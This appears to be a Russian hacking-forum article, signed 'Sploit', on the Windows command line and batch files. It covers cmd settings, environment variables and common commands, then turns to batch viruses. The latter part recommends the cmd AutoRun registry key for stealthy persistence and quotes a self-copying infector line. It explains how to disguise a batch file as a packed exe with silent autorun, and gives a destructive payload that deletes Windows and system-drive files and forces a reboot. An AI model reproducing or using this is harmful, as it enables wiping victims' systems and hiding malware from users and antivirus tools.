|
В интернете полно статей на подобную тему, но интерес к командной строке всё ещё не пропал. То и дело в сети появляются справочники, руководства, и конечно же примеры bat вирусов. И во многих случаях описываются лишь стандартные команды. Введите help в батнике и вы получите их небольшой список. Каждую новую для себя команду (хотя не такие уж они и новые) встречают с большим воодушевлением.
Ведь для создания batников не требуется никаких компиляторов, всё что нужно это винда и прямые руки... Самый полный справочник с описанием cmd.exe находится тут - папка Windows/Help/ntcmds.chm .
Обычный файл справки, просматриваемый стандартным средством операционки hh.exe. Также для вывода справки можно использовать меню Выполнить - hh ntcmds.chm . Для тех кто не в курсе любую программу из папки Windows можно запустить из этого меню не указывая пути и расширения файла.
Например, когда мы набираем "cmd" в системной папке ищется файл "cmd.exe" , находится в папке system32 и выполняется. Там находится полный список команд, включая и устаревшие (работающие только в Ms Dos), полезные сведения и советы по настройке.
Все команды расположены в алфавитном порядке, и в одну статью вряд ли поместятся. Так что смотрите у себя на компе. Настройка Запускаем командную строку, видим её значок в левом верхнем углу окна, правый клик мыши по нему и в открывшемся меню выбираем Свойства. Здесь мы можем настраивать cmd как угодно.
На вкладке Общие можно поменять размер курсора, размер буфера, режим отображения и разрешить или запретить выделение мышью. Полезная кстати вещь:) Далее идёт вкладка настройки шрифта, размеров окна и цвета. Если вам когда нибудь надоедали белые буквы на тёмном фоне, то их запросто можно поменять например на зелёные. Теперь о реестре - куда ж без него?
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Command Processor]: Никаких новых параметров нет за исключением одного - AutoRun. Любая программа указанная там будет выполнятся каждый раз при запуске командной строки. Я никогда раньше не встречал такого способа автозапуска, возможно кому нибудь это пригодится. Шансы того что вашу прогу запалят практически нулевые.
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Environment]: Здесь параметры некоторых переменных.
Список стандартных переменных:
%os% Имя системы
%windir% Путь к папке Windows
%systemdrive% Путь к системному диску
%programfiles% Путь к Program Files
%temp% Путь к временной папке
%tmp% То же что и %temp%
%allusersprofile% Путь к папке All users
%appdata% Путь к папке Application Data для текущего пользователя
%userprofile% Путь к папке с документами и настройками текущего пользователя
%path% Показывает стандартные системные пути. Многие проги любят менять значение этой переменной, добавляя туда путь своей рабочей папки
%pathext% Показывает стандартные расширения
%comspec% Путь к самому интерпретатору командной строки cmd.exe
%number_of_processors% Выводит количество прцессоров установленных в системе
%processor_architecture% Выводит что то наподобие x86
%processor_identifier% Технические характеристики процессора
Всё это можно вывести на экран. Например "echo %windir%".
Теперь список некоторых полезных команд:
Assoc - Выводит список всех расширений и программ с ними сопоставленных. "Assoc .exe = .gif" заставит систему считать все программы файлами изображений
Date [нужная дата} - Меняет системную дату
Driverquery - Выводит список всех установленных драйверов
Ftype .расширение = команда - Установка программы или команды, которая будет выполнятся при
Getmac - Выводит mac адрес компьютера
Hostname - Выводит имя узла
Ipconfig - Параметры протокола и сетевых адаптеров
Nbtstat - Вывод статистики протокола Netbios
Net - Содержит много параметров для работы с сетью
Netstat - Выводит на экран все активные в данный момент подключения
Nslookup адрес узла - Вывод доменного имени заданного узла
Reg подкоманды - Работа с реестром
Tasklist - Вывести список всех процессов
Taskkill - Убить процесс по Pid или имени
Насчёт вирусов.
Bat вирусы настолько мало распространены, что их список состоит из всего нескольких десятков и
подхватить где нибудь эдакую "заразу" весьма проблематично.
Но некоторые антивирусные компании всё же добавили сигнатуры в свои базы, видимо с желанием подзаработать.
Вот например строчка "for %a in (%windir%*.*) do echo %0 >> %a" палится как вирус... Как же запаковать bat файлы?
Можно создать sfx архив с помощью WinRara, поставив вашу прогу на автозапуск после распаковки и отключив визуальное окно потверждения и выбора пути для распаковки. Есть даже специальные проги для этого, например Quick Batch File Compiler. В итоге получаем обычный exeшник. Ставим для него иконку получше, сжимаем упаковщиком и наш вирь готов.
Для примера (и только для примера!) могу привести пример такого заподла, сочиненного на скорую руку:
Код:
"
@echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения.
color 40 - делаем фон файла красным, а буквы чёрными.
label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово.
attrib -s -r -h -a %systemdrive%*.* - снимаем системные атрибуты с некоторых файлов.
erase %windir%*.* /q - банальное удаление файлов.
erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем.
erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться.
regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много...
echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл.
shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы.
"
Это были лишь заготовки, а насколько серьёзно вы будете модифицировать реестр или изменять файлы зависит от вас. На этом статья подходит к концу, так как тема bat файлов исчерпана полностью. Больше чем команд в стандартном описании найти невозможно. Считайте файл ntcmds.chm дополнением к статье. Спасибо за внимание
Sploit
|
Вход
FAQ
Поиск
